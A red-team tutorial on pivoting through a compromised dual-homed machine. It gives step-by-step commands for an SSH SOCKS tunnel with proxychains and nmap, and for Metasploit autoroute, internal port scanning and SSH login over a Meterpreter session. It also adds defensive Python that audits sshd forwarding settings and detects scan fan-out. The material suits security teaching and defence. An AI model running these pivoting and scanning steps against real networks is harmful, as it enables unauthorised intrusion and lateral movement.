Privilege Escalation: Pivoting
As with SSH tunneling, pivoting is an essential skill for a Red Teamer. When you find a machine that is dual-homed, it gives you access to another network. As a Red Teamer we want to take advantage of this and see what we can attack on that network to move further into the organization.
Pivoting is at its base a fairly simple concept, but putting it into action correctly is an entirely different matter. There are many ways to pivot into another network to attack a machine. We will show two of them, proxychains and Meterpreter. Both have their advantages and disadvantages.
Our first look at pivoting will be done manually with proxychains. Proxychains is a nicely built tool that lets you run terminal commands over a SOCKS proxy, and a dynamic SSH tunnel creates exactly such a proxy for us.
First we create the dynamic SSH tunnel on port 4444.
ssh -D 4444 email@example.com
With the tunnel in place, we edit the proxychains config file to change two things.
# Comment out the following line with a #, as proxy_dns causes issues with nmap
#proxy_dns
# Change the port of the socks4 proxy to match the port we used after -D
socks4 127.0.0.1 4444
With both of these saved, we can use proxychains with nmap to scan the previously unknown network through our compromised machine.
# Nmap command
proxychains nmap -Pn -sT 10.0.2.4
It is important to note that nmap normally uses ICMP to identify live hosts. That is not possible through proxychains, because a SOCKS proxy only carries TCP connections, which is why the command above disables host discovery (-Pn) and uses a full TCP connect scan (-sT). This is the limitation of proxychains. But after running that command we can see that we can now start attacking the remote system or network at will.
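The dynamic tunnel above only works because sshd on the compromised host permits TCP forwarding, which is the setting a defender controls. The following Python is an added example, not code from the original page: it audits an sshd_config for the forwarding directives that make a dual-homed host usable as a SOCKS pivot, applying OpenSSH's documented defaults when a directive is absent and honouring the first occurrence of each keyword, as sshd does. Lines inside Match blocks are reported separately because they can re-enable forwarding for particular users even when the global section is hardened. The two configs at the bottom are constructed samples.

```python
"""Audit an sshd_config for the forwarding settings that let a compromised
dual-homed host be turned into a SOCKS pivot with `ssh -D`.

Added example; not from the original page. Assumes an OpenSSH-style config
file with `Keyword value` lines, `#` comments and optional `Match` blocks."""

# Forwarding directives and, for each, (hardened value, OpenSSH default when absent).
# AllowTcpForwarding "local" still permits -D, so only "no" counts as hardened.
FORWARDING_DIRECTIVES = {
    "allowtcpforwarding": ("no", "yes"),
    "allowagentforwarding": ("no", "yes"),
    "gatewayports": ("no", "no"),
    "permittunnel": ("no", "no"),
}


def parse_sshd_config(text):
    """Return (global_settings, match_block_lines).

    global_settings maps lowercased keyword -> lowercased value for the section
    before the first `Match`. sshd honours the first occurrence of a keyword, so
    later duplicates are ignored. Lines inside Match blocks are conditional and
    are returned separately for review."""
    global_settings = {}
    match_lines = []
    in_match = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            in_match = True
        if in_match:
            match_lines.append(line)
            continue
        global_settings.setdefault(key, value)
    return global_settings, match_lines


def audit_forwarding(text):
    """Return [(directive, effective_value, hardened_value)] for each forwarding
    directive whose effective global value is weaker than the hardened one."""
    settings, _ = parse_sshd_config(text)
    findings = []
    for directive, (hardened, default) in FORWARDING_DIRECTIVES.items():
        effective = settings.get(directive, default)
        if effective != hardened:
            findings.append((directive, effective, hardened))
    return findings


def match_overrides(text):
    """Return Match-block lines that set a forwarding directive; these can
    re-enable forwarding for specific users or hosts even when the global
    section is hardened."""
    _, match_lines = parse_sshd_config(text)
    return [l for l in match_lines
            if l.split(None, 1)[0].lower() in FORWARDING_DIRECTIVES]


# Constructed samples (not real configs): a stock-looking file that leaves
# forwarding at its defaults, and a hardened one with a Match-block exception.
WEAK_CONFIG = """\
Port 22
#AllowTcpForwarding no
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
Port 22
AllowTcpForwarding no
AllowAgentForwarding no
GatewayPorts no
PermitTunnel no
Match User backup
    AllowTcpForwarding local
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, "findings:", audit_forwarding(cfg))
        print(name, "match overrides:", match_overrides(cfg))
```

On the weak sample the audit flags AllowTcpForwarding and AllowAgentForwarding, both of which default to yes when the line is commented out; on the hardened sample the global section is clean but the Match block that grants a backup user local forwarding is surfaced for review, since local forwarding is enough for -D.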
The next way we will pivot to the additional network is with a Meterpreter session. We assume we have gained initial access and fully compromised the Windows machine, and we want to use its dual-homed nature to attack a machine for which we have a known set of SSH credentials. We can do this entirely in Metasploit!
The first thing we want to do is use autoroute to set up the route based on the output of ipconfig on the host. We can see it is on a 10.0.2.0/24 network, so we tell autoroute to add this.
NOTE: THIS MUST BE DONE INSIDE OF THE METERPRETER SESSION YOU WANT TO HAVE THE ROUTE POINT TO!
# Adding the route
run autoroute -s 10.0.2.0/24
# To view the route and see its ready
run autoroute -p
Now that the route is set, we can background the Meterpreter shell with CTRL+Z and use another module to run a port scan!
# Use the TCP port scan module
use auxiliary/scanner/portscan/tcp
# Setup the range/ports and threads
set RHOSTS 10.0.2.0/24
set PORTS 22,80
set THREADS 50
# Now we run
When we run this we can see that host 10.0.2.5 has port 22 open. We know we have valid SSH credentials for the organization, so let's try to get a Meterpreter shell on that host.
We can use another Metasploit module to connect and log in with SSH.
# Module to load
use auxiliary/scanner/ssh/ssh_login
# Set the parameters we want to use
set RHOSTS 10.0.2.5
set USERNAME admin
set PASSWORD admin
When we hit run, we can see we now have 2 sessions active! If we connect to the new session we can see we are indeed on another system inside the 10.0.2.0 network, using 192.168.1.11 as a pivot point!
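Whichever route the scan takes, proxychains with nmap or portscan/tcp over an autoroute, the traffic that reaches the 10.0.2.0/24 segment has the same shape: one internal source touching many distinct host:port pairs in a short time. The following Python is an added example, not from the original page, that flags that fan-out in connection logs. It assumes a constructed one-line-per-connection format (`<time> src=<ip> dst=<ip> dport=<port>`); the sample uses 10.0.2.100 as a stand-in for the pivot's address on the inner segment, which the page does not give, sweeping ports 22 and 80 across twenty hosts as the portscan above would.

```python
"""Flag a host that fans out to many internal destinations in a short window:
the traffic shape left by a port scan run through a pivot, whether
proxychains+nmap over an SSH SOCKS tunnel or Metasploit's portscan/tcp over an
autoroute. Added example; not from the original page.

Assumed (constructed) log format, one accepted or denied connection per line:
    <YYYY-MM-DDTHH:MM:SS> src=<ip> dst=<ip> dport=<port>"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$")


def parse_line(line):
    """Return (timestamp, src, dst, dport) or None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S")
    return ts, m.group("src"), m.group("dst"), int(m.group("dport"))


def find_fanout(lines, min_targets=10, window=timedelta(seconds=60)):
    """Return {src: (distinct_targets, window_start, window_end)} for every source
    that reached at least `min_targets` distinct dst:port pairs inside `window`.
    The reported window is the one with the highest distinct count for that source."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dst, dport = parsed
        events[src].append((ts, (dst, dport)))

    alerts = {}
    for src, evs in events.items():
        evs.sort()
        best, best_span = 0, None
        # Slide a window starting at each event and count distinct targets in it
        for i, (start, _) in enumerate(evs):
            seen, end = set(), start
            for ts, target in evs[i:]:
                if ts - start > window:
                    break
                seen.add(target)
                end = ts
            if len(seen) > best:
                best, best_span = len(seen), (start, end)
        if best >= min_targets:
            alerts[src] = (best, best_span[0], best_span[1])
    return alerts


def constructed_logs():
    """Constructed sample: 10.0.2.100 stands in for the pivot's interface on the
    10.0.2.0/24 segment (the page does not give that address) sweeping ports 22
    and 80 across twenty hosts, mixed with a normal host's occasional traffic."""
    base = datetime(2024, 1, 1, 10, 0, 0)
    lines = []
    for i in range(1, 21):
        for port in (22, 80):
            ts = base + timedelta(seconds=i - 1)
            lines.append(f"{ts:%Y-%m-%dT%H:%M:%S} src=10.0.2.100 dst=10.0.2.{i} dport={port}")
    normal = [("10.0.2.5", 22), ("10.0.2.7", 80), ("10.0.2.5", 22), ("10.0.2.7", 80)]
    for k, (dst, port) in enumerate(normal):
        ts = base + timedelta(minutes=5 * k)
        lines.append(f"{ts:%Y-%m-%dT%H:%M:%S} src=10.0.2.50 dst={dst} dport={port}")
    return lines


if __name__ == "__main__":
    for src, (count, start, end) in find_fanout(constructed_logs()).items():
        print(f"{src}: {count} distinct dst:port pairs between {start:%H:%M:%S} and {end:%H:%M:%S}")
```

The threshold counts distinct destination:port pairs rather than raw connections, so a busy but legitimate client that keeps reopening the same two services stays below it, while a scan of two ports across a /24 crosses it within seconds. The same fan-out logic applied to sshd authentication failures on 10.0.2.5 would surface the ssh_login stage as well.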